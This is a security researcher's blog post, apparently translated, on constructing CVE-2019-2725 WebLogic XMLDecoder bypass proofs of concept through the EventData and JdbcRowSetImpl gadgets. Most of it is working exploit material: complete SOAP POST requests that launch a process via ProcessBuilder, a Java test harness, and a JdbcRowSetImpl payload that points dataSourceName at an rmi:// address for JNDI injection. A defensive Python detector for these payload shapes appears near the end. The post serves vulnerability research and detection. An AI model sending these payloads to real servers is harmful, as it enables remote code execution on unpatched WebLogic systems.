# CVE-2019-2725 secondary deserialization: EventData gadget POC / JdbcRowSetImpl POC construction

CVE-2019-2725 secondary deserialization: EventData gadget POC

When constructing the MapMsgEntity POC the following error is thrown. The cause, as 畅师傅 already pointed out, is that the class is not public.
To trace exactly where the error is raised, proceed as follows. The error output is:

    java.lang.NoSuchMethodException: <unbound>=Class.new(byteArray);
    

Search the whole codebase for NoSuchMethodException, run until execution reaches the throw site, then walk back up the call stack; that is enough to trace it.
The vulnerable code is as follows:
[screenshot: vulnerable code]
The POC is below. I did not know how to pass a String-typed argument to the EventData class; I hammered out the following request, which does execute the command. This is a pitfall, and I still need to look at how the experts construct their POC.

    POST /_async/AsyncResponseService HTTP/1.1
    Host: 121.195.170.96:7001
    Accept-Encoding: gzip, deflate
    SOAPAction: 
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    Content-Length: 885
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
    <java><class><string>org.slf4j.ext.EventData</string><void>
    <array class="java.lang.String" length="1">
      <void index="0">
       <string>"<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>"</string>
      </void>
     </array>
    </void></class>
    </java>
     </work:WorkContext>
     </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    
    

Running the following code executes the command:

    package weblogic;
    import java.beans.XMLDecoder;
    import java.io.ByteArrayInputStream;
    import java.io.File;
    import java.io.IOException;
    public class Test {
        // ByteArrayInputStream works on an in-memory array and opens no file descriptor, so the stream need not be closed
    
        public static void main(String[] args) {
            ByteArrayInputStream bais=null;
            StringBuilder sb=new StringBuilder();
            int temp=0;
            int num=0;
            long date1=System.currentTimeMillis();
            try{
    
                // bais holds the payload we constructed (the inner quotes must be escaped inside a Java string literal)
                bais=new ByteArrayInputStream("<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"><object class=\"java.lang.ProcessBuilder\"><array class=\"java.lang.String\" length=\"1\"><void index=\"0\"><string>calc</string></void></array><void method=\"start\" /></object></java>".getBytes());
                XMLDecoder decoder = new XMLDecoder(bais);
                decoder.readObject();
                // XMLDecoder has already consumed the whole stream by now, so this loop normally reads nothing
                while((temp=bais.read())!=-1){
                    sb.append((char)temp);
                    num++;
                }
                System.out.println(sb);
                System.out.println("读取的字节数:"+num);
            }finally{
                try{
                    bais.close();// closing is unnecessary, but calling close() is harmless: it does nothing
                }catch(IOException e){
                    e.printStackTrace();
                }
                new File("d:"+File.separator+"a.txt");// File.separator is the platform file separator, so this runs on both Windows and Linux
            }
            long date2=System.currentTimeMillis();
            System.out.println("耗时:"+(date2-date1));
    
        }
    
    }
    

When debugging I found that execution never reached that code.
It is really puzzling; I still do not know how the POC above popped the calculator. The final POC is below. It turns out the argument can be placed here: <void><string><![CDATA[POC]]></string></void>

    POST /_async/AsyncResponseService HTTP/1.1
    Host: 121.195.170.96:7001
    Accept-Encoding: gzip, deflate
    SOAPAction: 
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    Content-Length: 801
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
    <java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start" /></object></java>]]></string>
    </void></class>
    </java>
     </work:WorkContext>
     </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    

Execution finally reaches this point: RCE.
There is still the last POC, for the com.sun.rowset.JdbcRowSetImpl class, to write; I have to get it working.

CVE-2019-2725 secondary deserialization: JdbcRowSetImpl gadget POC construction

JDK 1.6 has no property tag; it is available from JDK 1.7 on. Because the bypass relies on the property tag to assign values, it only works on WebLogic 12; on WebLogic 10.3.6 the following error is thrown:

    java.lang.Exception: Unrecognized opening tag: property name="dataSourceName"
    Continuing ...
    java.lang.Exception: Unrecognized closing tag: property
    Continuing ...
    java.lang.Exception: Unrecognized opening tag: property name="autoCommit"
    Continuing ...
    java.lang.Exception: Unrecognized closing tag: property
    Continuing ...
    java.lang.NoSuchMethodException: <unbound>=Class.new("rmi://localhost:9999/aa", Boolean);
    

The POC is as follows:

    POST /_async/AsyncResponseService HTTP/1.1
    Host: 121.195.170.96:7001
    Accept-Encoding: gzip, deflate
    SOAPAction: 
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    Content-Length: 694
    
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">      
    <java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>
    <property name="dataSourceName"><string>rmi://localhost:9999/aa</string></property><property name="autoCommit"><boolean>true</boolean></property>
    </void></class>
    </java>
     </work:WorkContext>
     </soapenv:Header> <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    

The property tag replaces <void property="">. The earlier POC:

        <void class="com.sun.rowset.JdbcRowSetImpl">
            <void property="dataSourceName">
             <string>rmi://121.195.170.127:2222/aa</string>
            </void>
            <void property="autoCommit">
                <boolean>true</boolean>
            </void>
        </void>
    </java>
    

The bypass POC:

    <java>
    <class>
    <string>com.sun.rowset.JdbcRowSetImpl</string>
    <void>
    	<property name="dataSourceName"><string>rmi://localhost:9999/aa</string>
    	</property>
    	<property name="autoCommit">
    	<boolean>true</boolean>
    	</property>
    </void>
    </class>
    </java>
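
As a defender-side companion to both gadgets above (added here; not the original post's code and not WebLogic's own filter), the following Python sketch parses an incoming SOAP request, locates the `work:WorkContext` header and flags the XMLDecoder constructs these POCs rely on: the `<class>` wrapper, `<property>` and `<void property>` setters, the gadget class names, an rmi:// or ldap:// dataSourceName, and a second `<java>` document smuggled inside a `<string>` CDATA section, which it decodes the way the EventData(String) constructor would and scans again. The sample envelopes are constructed for this example and `attacker.invalid` is a placeholder.

```python
import xml.etree.ElementTree as ET

WORKCONTEXT = "{http://bea.com/2004/06/soap/workarea/}WorkContext"
GADGETS = {"org.slf4j.ext.EventData", "com.sun.rowset.JdbcRowSetImpl", "java.lang.ProcessBuilder"}


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # drop ElementTree's {namespace} prefix


def scan_java_document(java_el):
    """Walk one XMLDecoder <java> document and collect the suspicious constructs."""
    findings = set()
    for el in java_el.iter():
        name, text = _local(el.tag), (el.text or "").strip()
        if name in ("class", "object", "property"):
            findings.add("tag:" + name)               # tags that instantiate or assign
        if name == "void" and "property" in el.attrib:
            findings.add("void-property")             # the pre-bypass setter form
        if "method" in el.attrib:
            findings.add("method:" + el.attrib["method"])
        for cls in (el.attrib.get("class"), text if name == "string" else None):
            if cls in GADGETS:
                findings.add("gadget:" + cls)
        if name == "string" and text.startswith(("rmi://", "ldap://")):
            findings.add("jndi-uri")                  # JdbcRowSetImpl dataSourceName target
        if name == "string" and text.startswith("<java"):
            findings.add("nested-java")               # CDATA-smuggled second document:
            try:                                      # decode it as EventData's constructor would
                findings |= scan_java_document(ET.fromstring(text))
            except ET.ParseError:
                pass
    return findings


def analyze_soap_request(body):
    """Indicators over every <java> document inside the WorkContext header; empty set = clean."""
    findings = set()
    for ctx in ET.fromstring(body).iter(WORKCONTEXT):
        for el in ctx.iter():
            if _local(el.tag) == "java":
                findings |= scan_java_document(el)
    return findings


# Constructed samples (not from the page): a harmless WorkContext, the EventData CDATA shape
# and the JdbcRowSetImpl <property> shape, with the inner command replaced by "id".
ENVELOPE = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext'
            ' xmlns:work="http://bea.com/2004/06/soap/workarea/">%s</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>')
SAMPLE_BENIGN = ENVELOPE % "<java><string>hello</string></java>"
SAMPLE_EVENTDATA = ENVELOPE % ('<java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA['
    '<java><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0">'
    '<string>id</string></void></array><void method="start"/></object></java>]]></string></void></class></java>')
SAMPLE_JDBC = ENVELOPE % ('<java><class><string>com.sun.rowset.JdbcRowSetImpl</string><void>'
    '<property name="dataSourceName"><string>rmi://attacker.invalid:9999/aa</string></property></void></class></java>')
```

Any non-empty result is grounds to reject the request; the names tell you which gadget shape was used.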
    

I will not debug the vulnerability here; see my earlier write-up: https://www.cnblogs.com/afanti/p/10222293.html
References:
https://paper.seebug.org/909/
Assigning a value to an XML property attribute

Original article: https://www.cnblogs.com/afanti/p/10816028.html